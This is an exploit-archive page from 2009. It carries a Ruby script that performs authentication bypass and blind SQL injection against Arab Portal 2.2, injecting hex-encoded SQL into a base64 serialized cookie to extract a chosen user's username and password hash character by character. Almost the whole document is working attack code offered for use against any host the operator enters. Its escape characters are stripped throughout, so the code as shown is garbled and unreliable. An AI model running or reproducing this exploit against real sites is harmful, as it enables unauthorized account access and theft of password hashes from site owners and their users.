[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit
# Published : 2009-08-07
# Author : Jafer Al Zidjali
# Previous Title : Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability
# Next Title : PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
#!/usr/bin/ruby
#=============================================#
# Arab Portal v2.2 Exploit #,
# Blind SQL Injection / Authentication Bypass #
# Discovered & written by: Jafer Al-Zidjali #
# Email: jafer@scorpionds.com #
# Website: www.scorpionds.com #
#=============================================#
require "net/http"
require "base64"
intro=[
"+=============================================+",
"+ Arab Portal v2.2 Exploit +",
"+ Blind SQL Injection / Authentication Bypass +",
"+ Discovered & written by: Jafer Al-Zidjali +",
"+ Email: jafer@scorpionds.com +",
"+ Website: www.scorpionds.com +",
"+=============================================+"
]
def print_intro text
w="|"
text.each do |str|
str.scan(/./) do |c|
STDOUT.flush
if w=="|"
print "b"+c +w
w="/"
elsif w=="/"
print "b"+c +w
w="-"
elsif w=="-"
print "b"+c +w
w="\"
else
print "b"+c +w
w="|"
end
sleep 0.05
end
print "b "
puts ""
end
end
print_intro intro
puts "nEnter host name (e.g. example.com):"
host=gets.chomp
puts "nEnter script path (e.g. /arabportal/):"
path=gets.chomp
puts "nEnter userid:"
userid=gets.chomp
puts "nGetting cookie value..."
http = Net::HTTP.new(host, 80)
resp= http.get(path)
cookie = resp.response["set-cookie"]
len=cookie.split("; ").length
max=0
login_info=""
len.times do |count|
clen=cookie.split("; ")[count].length
if clen > max then
max=clen
login_info=cookie.split("; ")[count]
end
end
login_info=login_info.split(", ")
if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end
login_info=login_info.split("=")[0]
puts "Cookie name is: "+login_info
puts "nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."
opt=gets.chomp
if opt=="1"
unamelen=0
print "nGetting username length"
20.times do |x|
stmt="#{userid}"+
"x27x20x61x6ex64x20x6c"+
"x65x6ex67x74x68x28x75"+
"x73x65x72x6ex61x6dx65"+
"x29x3d#{x}x20x6fx72x20x27x27x3dx27"
shellcode="x61x3ax35x3ax7bx69x3ax30"+
"x3bx73x3ax31x30x3ax22x61"+
"x72x61x62x70x6fx72x74x61"+
"x6cx22x3bx69x3ax31x3bx69"+
"x3ax31x3bx69x3ax32x3bx73x3a"+
stmt.length.to_s+
"x3ax22"+
stmt+
"x22x3bx69x3ax33x3bx69x3a"+
"x30x3bx69x3ax34x3bx73x3a"+
"x31x3ax22x61x22x3bx7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
}
resp= http.get(path,header)
if resp.body =~ /action=logout/
puts "nLength is: #{x}"
unamelen=x
break
else
print "."
STDOUT.flush
end
end
chars="abcdefghijklmnopqrstuvwxyz0123456789"
print "nGetting username: "
unamelen.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"x27x20x61x6ex64x20x73"+
"x75x62x73x74x72x69x6e"+
"x67x28x75x73x65x72x6e"+
"x61x6dx65x2c#{z+1}x2cx31x29x3dx27#{c}x27x20x6fx72x20x27x27x3dx27"
shellcode="x61x3ax35x3ax7bx69x3ax30"+
"x3bx73x3ax31x30x3ax22x61"+
"x72x61x62x70x6fx72x74x61"+
"x6cx22x3bx69x3ax31x3bx69"+
"x3ax31x3bx69x3ax32x3bx73x3a"+
stmt.length.to_s+
"x3ax22"+
stmt+
"x22x3bx69x3ax33x3bx69x3a"+
"x30x3bx69x3ax34x3bx73x3a"+
"x31x3ax22x61x22x3bx7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "b"
end
end
puts "nHave fun :)"
elsif opt=="2"
chars="0123456789abcdef"
print "nGetting password hash: "
32.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"x27x20x61x6ex64x20x73x75"+
"x62x73x74x72x69x6ex67x28"+
"x70x61x73x73x77x6fx72x64"+
"x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
"x20x6fx72x20x27x27x3dx27"
shellcode="x61x3ax35x3ax7bx69x3ax30"+
"x3bx73x3ax31x30x3ax22x61"+
"x72x61x62x70x6fx72x74x61"+
"x6cx22x3bx69x3ax31x3bx69"+
"x3ax31x3bx69x3ax32x3bx73x3a"+
stmt.length.to_s+
"x3ax22"+
stmt+
"x22x3bx69x3ax33x3bx69x3a"+
"x30x3bx69x3ax34x3bx73x3a"+
"x31x3ax22x61x22x3bx7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "b"
end
end
puts "nHave fun :)"
end
# www.Syue.com [2009-08-07]